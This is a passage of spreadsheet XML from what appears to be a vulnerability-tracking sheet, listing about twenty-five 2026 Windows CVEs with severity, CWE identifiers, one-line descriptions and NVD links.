      </c>
      <c r="G1953" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1953" s="5" t="inlineStr"/>
      <c r="I1953" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1953" s="5" t="inlineStr"/>
      <c r="K1953" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L1953" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t>
        </is>
      </c>
    </row>
    <row r="1954">
      <c r="A1954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68894</t>
        </is>
      </c>
      <c r="C1954" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1954" s="5" t="inlineStr"/>
      <c r="F1954" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1954" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1954" s="5" t="inlineStr"/>
      <c r="I1954" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1954" s="5" t="inlineStr"/>
      <c r="K1954" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1954" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t>
        </is>
      </c>
    </row>
    <row r="1955">
      <c r="A1955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69271</t>
        </is>
      </c>
      <c r="C1955" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1955" s="5" t="inlineStr"/>
      <c r="F1955" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1955" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1955" s="5" t="inlineStr"/>
      <c r="I1955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1955" s="5" t="inlineStr"/>
      <c r="K1955" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1955" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t>
        </is>
      </c>
    </row>
    <row r="1956">
      <c r="A1956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69301</t>
        </is>
      </c>
      <c r="C1956" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1956" s="5" t="inlineStr"/>
      <c r="F1956" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1956" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1956" s="5" t="inlineStr"/>
      <c r="I1956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1956" s="5" t="inlineStr"/>
      <c r="K1956" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1956" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t>
        </is>
      </c>
    </row>
    <row r="1957">
      <c r="A1957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69322</t>
        </is>
      </c>
      <c r="C1957" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1957" s="5" t="inlineStr"/>
      <c r="F1957" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1957" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1957" s="5" t="inlineStr"/>
      <c r="I1957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1957" s="5" t="inlineStr"/>
      <c r="K1957" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1957" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t>
        </is>
      </c>
    </row>
    <row r="1958">
      <c r="A1958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="C1958" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1958" s="5" t="inlineStr"/>
      <c r="F1958" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1958" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1958" s="5" t="inlineStr"/>
      <c r="I1958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1958" s="5" t="inlineStr"/>
      <c r="K1958" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1958" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="1959">
      <c r="A1959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69346</t>
        </is>
      </c>
      <c r="C1959" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1959" s="5" t="inlineStr"/>
      <c r="F1959" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1959" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1959" s="5" t="inlineStr"/>
      <c r="I1959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1959" s="5" t="inlineStr"/>
      <c r="K1959" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1959" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t>
        </is>
      </c>
    </row>
    <row r="1960">
      <c r="A1960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69365</t>
        </is>
      </c>
      <c r="C1960" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1960" s="5" t="inlineStr"/>
      <c r="F1960" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1960" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1960" s="5" t="inlineStr"/>
      <c r="I1960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1960" s="5" t="inlineStr"/>
      <c r="K1960" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1960" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t>
        </is>
      </c>
    </row>
    <row r="1961">
      <c r="A1961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69371</t>
        </is>
      </c>
      <c r="C1961" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1961" s="5" t="inlineStr"/>
      <c r="F1961" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1961" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1961" s="5" t="inlineStr"/>
      <c r="I1961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1961" s="5" t="inlineStr"/>
      <c r="K1961" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1961" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t>
        </is>
      </c>
    </row>
    <row r="1962">
      <c r="A1962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="C1962" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1962" s="5" t="inlineStr"/>
      <c r="F1962" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1962" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1962" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1962" s="5" t="inlineStr"/>
      <c r="K1962" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1962" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M1962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="1963">
      <c r="A1963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69418</t>
        </is>
      </c>
      <c r="C1963" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1963" s="5" t="inlineStr"/>
      <c r="F1963" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1963" s="5" t="inlineStr"/>
      <c r="H1963" s="5" t="inlineStr"/>
      <c r="I1963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1963" s="5" t="inlineStr"/>
      <c r="K1963" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t>
        </is>
      </c>
    </row>
    <row r="1964">
      <c r="A1964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="C1964" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1964" s="5" t="inlineStr"/>
      <c r="F1964" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1964" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1964" s="5" t="inlineStr"/>
      <c r="I1964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1964" s="5" t="inlineStr"/>
      <c r="K1964" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1964" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="1965">
      <c r="A1965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69427</t>
        </is>
      </c>
      <c r="C1965" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1965" s="5" t="inlineStr"/>
      <c r="F1965" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1965" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1965" s="5" t="inlineStr"/>
      <c r="I1965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1965" s="5" t="inlineStr"/>
      <c r="K1965" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1965" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t>
        </is>
      </c>
    </row>
    <row r="1966">
      <c r="A1966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69458</t>
        </is>
      </c>
      <c r="C1966" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1966" s="5" t="inlineStr"/>
      <c r="F1966" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1966" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1966" s="5" t="inlineStr"/>
      <c r="I1966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1966" s="5" t="inlineStr"/>
      <c r="K1966" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1966" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t>
        </is>
      </c>
    </row>
    <row r="1967">
      <c r="A1967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69462</t>
        </is>
      </c>
      <c r="C1967" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1967" s="5" t="inlineStr"/>
      <c r="F1967" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1967" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1967" s="5" t="inlineStr"/>
      <c r="I1967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1967" s="5" t="inlineStr"/>
      <c r="K1967" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1967" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t>
        </is>
      </c>
    </row>
    <row r="1968">
      <c r="A1968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69481</t>
        </is>
      </c>
      <c r="C1968" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1968" s="5" t="inlineStr"/>
      <c r="F1968" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1968" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1968" s="5" t="inlineStr"/>
      <c r="I1968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1968" s="5" t="inlineStr"/>
      <c r="K1968" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1968" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t>
        </is>
      </c>
    </row>
    <row r="1969">
      <c r="A1969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="C1969" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1969" s="5" t="inlineStr"/>
      <c r="F1969" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1969" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1969" s="5" t="inlineStr"/>
      <c r="I1969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1969" s="5" t="inlineStr"/>
      <c r="K1969" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1969" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="1970">
      <c r="A1970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="C1970" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1970" s="5" t="inlineStr"/>
      <c r="F1970" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1970" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1970" s="5" t="inlineStr"/>
      <c r="I1970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1970" s="5" t="inlineStr"/>
      <c r="K1970" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1970" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="1971">
      <c r="A1971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69512</t>
        </is>
      </c>
      <c r="C1971" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1971" s="5" t="inlineStr"/>
      <c r="F1971" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1971" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1971" s="5" t="inlineStr"/>
      <c r="I1971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1971" s="5" t="inlineStr"/>
      <c r="K1971" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L1971" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t>
        </is>
      </c>
    </row>
    <row r="1972">
      <c r="A1972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69619</t>
        </is>
      </c>
      <c r="C1972" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1972" s="5" t="inlineStr"/>
      <c r="F1972" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1972" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1972" s="5" t="inlineStr"/>
      <c r="I1972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1972" s="5" t="inlineStr"/>
      <c r="K1972" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1972" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t>
        </is>
      </c>
    </row>
    <row r="1973">
      <c r="A1973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69623</t>
        </is>
      </c>
      <c r="C1973" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1973" s="5" t="inlineStr"/>
      <c r="F1973" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1973" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1973" s="5" t="inlineStr"/>
      <c r="I1973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1973" s="5" t="inlineStr"/>
      <c r="K1973" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1973" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t>
        </is>
      </c>
    </row>
    <row r="1974">
      <c r="A1974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69625</t>
        </is>
      </c>
      <c r="C1974" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1974" s="5" t="inlineStr"/>
      <c r="F1974" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1974" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1974" s="5" t="inlineStr"/>
      <c r="I1974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1974" s="5" t="inlineStr"/>
      <c r="K1974" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1974" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t>
        </is>
      </c>
    </row>
    <row r="1975">
      <c r="A1975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69643</t>
        </is>
      </c>
      <c r="C1975" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1975" s="5" t="inlineStr"/>
      <c r="F1975" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1975" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1975" s="5" t="inlineStr"/>
      <c r="I1975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1975" s="5" t="inlineStr"/>
      <c r="K1975" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1975" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t>
        </is>
      </c>
    </row>
    <row r="1976">
      <c r="A1976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69681</t>
        </is>
      </c>
      <c r="C1976" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1976" s="5" t="inlineStr"/>
      <c r="F1976" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1976" s="5" t="inlineStr"/>
      <c r="H1976" s="5" t="inlineStr"/>
      <c r="I1976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1976" s="5" t="inlineStr"/>
      <c r="K1976" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1976" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t>
        </is>
      </c>
    </row>
    <row r="1977">
      <c r="A1977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69689</t>
        </is>
      </c>
      <c r="C1977" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1977" s="5" t="inlineStr"/>
      <c r="F1977" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1977" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1977" s="5" t="inlineStr"/>
      <c r="I1977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1977" s="5" t="inlineStr"/>
      <c r="K1977" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
